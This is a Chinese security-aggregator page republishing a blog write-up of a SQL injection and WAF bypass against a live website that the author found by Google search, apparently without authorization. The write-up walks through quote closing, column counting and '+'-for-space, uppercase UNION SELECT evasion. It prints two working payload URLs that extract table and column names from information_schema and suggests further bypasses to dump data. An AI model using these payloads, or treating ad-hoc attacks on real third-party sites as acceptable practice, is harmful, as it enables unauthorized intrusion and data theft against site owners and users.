• 首页 |
  • 资讯 |
  • 生活 |
  • 电脑 |
  • 互联网 |
  • 手机 |
  • 财经 |
  • 教育 |
  • 简易号 |
    •   
      
      
      
    您当前的位置:首页 > 电脑百科 > 安全防护 > 数据安全

    一次简单的SQL注入绕WAF

    时间:2021-10-19 09:10:30  来源:博客园  作者:
    + 加入收藏

    本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个

    1、目标网站

     

    2、发现有WAF防护

     

     

    3、判断存在注入

     

     

     4、猜测了一下闭合为",果真是"闭合,而且没有触发WAF,感觉还挺幸运的

     

     

     5、尝试使用 order by判断当前数据库的字段数为20,本来以为WAF会拦截,发现也没有拦截

     

     

     6、判断显示位,这次直接被拦截了

     

     

     7、绕WAF,通过使用(+)代替空格的方法绕过WAF的拦截,并大写UNION SELECT,判断出显错点为5和10

     

     

      8、查询数据库用户名和数据库名

     

     

     9、查询当前数据库表名,列名

    查询表名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

    +from+information_schema.tables+where+table_schema=database()+%23

     

     

     

    查询列名 http://www.****.com/product.php?sid=80&id=-218%27+UNION+SELECT+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

    +from+information_schema.columns+where+table_name=%27s1_ad1%27+limit+1,1%20+%23

     

     

     点到为止嘛没有继续下去了,然后直接交公益src了,其实显错点10也可以同显错点5一样的操作查询处库名表名列名到最后的字段内容,还可以用group_concat()这个函数查询出多个数据库名,不过试了一下WAF拦截了,可以尝试替换等价函数或者其他方法啊应该也是可以绕过WAF的,不行的话,也可以尝试用burp抓包跑出表名,列名,字段名



    Tags:SQL注入   点击:()  评论:()
    声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
    ▌相关推荐
    一次某大学sql注入到getshell
    前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
    2021-11-26  Tags: SQL注入  点击:(21)  评论:(0)  加入收藏
    一次简单的SQL注入绕WAF
    本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
    2021-10-19  Tags: SQL注入  点击:(51)  评论:(0)  加入收藏
    SQL注入笔记记录+MySQL的事务隔离级别
    (一)SQL注入。1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。2.SQL注入是如何产生的? web开发人员无法保证所有的输入...【详细内容】
    2021-09-17  Tags: SQL注入  点击:(46)  评论:(0)  加入收藏
    如何避免出现SQL注入漏洞
    一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
    2021-09-17  Tags: SQL注入  点击:(65)  评论:(0)  加入收藏
    部分sql注入总结
    前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
    2021-08-26  Tags: SQL注入  点击:(59)  评论:(0)  加入收藏
    sql注入绕过与sqlmap绕过使用总结
    前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
    2021-08-13  Tags: SQL注入  点击:(63)  评论:(0)  加入收藏
    我要悄悄地注入,然后惊艳所有人!(SQL快速注入漏洞技巧)
    1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
    2021-08-04  Tags: SQL注入  点击:(74)  评论:(0)  加入收藏
    Mysql注入总结
    0×00:前言对于MYSQL知识的一个初总结 0×01:正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写,利用此特性可以进行大小写过正则匹配,举个简单的例子,有的题目中只...【详细内容】
    2021-07-29  Tags: SQL注入  点击:(88)  评论:(0)  加入收藏
    zzzphp save.php save_content方法下sql注入
    在本地搭建服务器,httpd-vhosts.conf 中设置本地绑定的域名: 其中,zzzphp为下载的zzzphp cms的内容。然后,本机上的zzzphp cms的目录结构为如下: 在按照要求安装好cms后,本地cms的...【详细内容】
    2021-07-16  Tags: SQL注入  点击:(80)  评论:(0)  加入收藏
    Mysql注入 -- 联合注入
    得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、order by排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回...【详细内容】
    2021-05-13  Tags: SQL注入  点击:(223)  评论:(0)  加入收藏
    ▌简易百科推荐
    怀疑流氓软件后台偷偷读文件?教你如何实锤
    众所周知,Windows系统流氓软件众多,其中不乏出身大厂的产品。这些带有流氓性质的软件,很多都会偷偷扫描系统数据,读取用户文件,造成电脑卡顿拖慢不说,还严重侵害了个人隐私,造成巨...【详细内容】
    2021-12-06  趣玩APPS    Tags:流氓软件   点击:(16)  评论:(0)  加入收藏
    一次某大学sql注入到getshell
    前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
    2021-11-26  IT野涵    Tags:sql注入   点击:(21)  评论:(0)  加入收藏
    数据库:评估安全风险4个要点
    互联网时代,不论是个人还是组织,都将数据视为一项重要的资产。为了便于存储、管理,企业常常会为各项数据建立一个数据库,如果没有做好安全风险防护,一旦数据库被攻占,企业将迎来很...【详细内容】
    2021-10-28  快快网络   企鹅号  Tags:数据库   点击:(50)  评论:(0)  加入收藏
    攻防演练中攻击方是如何打开缺口的方法
    前言(可能思路狭隘,有缺有错,师傅们多带带)【查看资料】Author: 0ne本篇文章数据来源于18+省市级别HVV,90+单位失陷报告。(一部分是笔者的参与,一部分是薅的公司其他师傅的报告...【详细内容】
    2021-10-28  IT野涵    Tags:缺口   点击:(46)  评论:(0)  加入收藏
    一次简单的SQL注入绕WAF
    本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
    2021-10-19    博客园  Tags:SQL注入   点击:(51)  评论:(0)  加入收藏
    如何避免出现SQL注入漏洞
    一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
    2021-09-17  woaker    Tags:SQL注入漏洞   点击:(65)  评论:(0)  加入收藏
    部分sql注入总结
    前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
    2021-08-26  合天网安实验室    Tags:sql注入   点击:(59)  评论:(0)  加入收藏
    IPFS真的这么牛吗?它是如何解决数据安全的问题的?
    “放纵自己的欲望是最大的祸害,窥探别人的隐私是最大的罪恶,不知自己的过失是最大的病痛”。 上文咱们知道了目前互联网的数据安全存在隐患,数据安全的问题,每天都在发生,只不过...【详细内容】
    2021-08-13  小陶子矿工    Tags:IPFS   点击:(79)  评论:(0)  加入收藏
    sql注入绕过与sqlmap绕过使用总结
    前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
    2021-08-13  IT影子    Tags:sql注入   点击:(63)  评论:(0)  加入收藏
    我要悄悄地注入,然后惊艳所有人!(SQL快速注入漏洞技巧)
    1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
    2021-08-04  李志宽    Tags:SQL注入   点击:(74)  评论:(0)  加入收藏
    推荐资讯
    远程软件发展迅猛,ToDesk凭何异军突起?
    远程软件发展迅猛,ToDe    		倒计时!企业QQ即将下架,社交QQ会被下架吗?
    倒计时!企业QQ即将下架
    极简Windows11与iPhone/iPad互传文件
    极简Windows11与iPhon    		iPhone信号问题,花10元就能解决?
    iPhone信号问题,花10元
    惊人数据:App Store中40万应用根本没人下载过
    惊人数据:App Store中4    		个人所得税递延纳税报告
    个人所得税递延纳税报
    非常实用的 Python 库,推一次火一次
    非常实用的 Python 库    		等离子电视技术先进,为何还是被淘汰?液晶电视到底有何优势?
    等离子电视技术先进,为
    相关文章
    最新更新
    栏目热门
    栏目头条
    高级搜索
    网站首页 | 关于我们 | 服务条款 | 广告服务 | 联系我们 | 网站地图 | 免责声明 | 手机版
    Copyright @ 简易百科 V 2.0 ©2020-2022 ISOLVES.com | 电脑百科 | 生活百科 | 手机百科 | 简易号
    京ICP备14042104号   京公网安备 11010802035086号  QQ:2595517585
    简易百科手机版